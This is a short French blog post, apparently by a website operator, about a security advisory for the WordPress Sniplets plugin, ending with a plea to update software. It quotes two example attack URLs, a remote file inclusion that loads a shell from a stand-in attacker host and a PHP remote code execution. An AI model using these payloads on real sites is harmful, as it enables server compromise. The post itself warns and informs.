Tout à l'heure vers 18:00 GMT+4 je vois un advisory sortir concernant le plugin Sniplets de Wordpress.
Je ne fais pas plus attention que ça. L'advisory compte trois failles dont deux que je considére comme critique. Une inclusion de fichiers distant (Remote File Inclusion) et d'une execution de code PHP à distance (Remote Code Execution).
Exemple du Remote File Inclusion http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=http://attacker.tld/shell.txt? Exemple du Remote Code Execution http://victim.tld/wordpress/wp-content/plugins/sniplets/modules/execute.php?text=%3C?php%20system(%22ls%22);
Quelque heures plus tard nous commencons à recevoir une pluie de requêtes de spam sur nos sites venant de site piraté utilisant du Wordpress.
Après quelque minutes je me rend compte qu'il y a eu pas moins de 8 failles dans Wordpress sur le mois de Février.
Mettez à jour vos applications !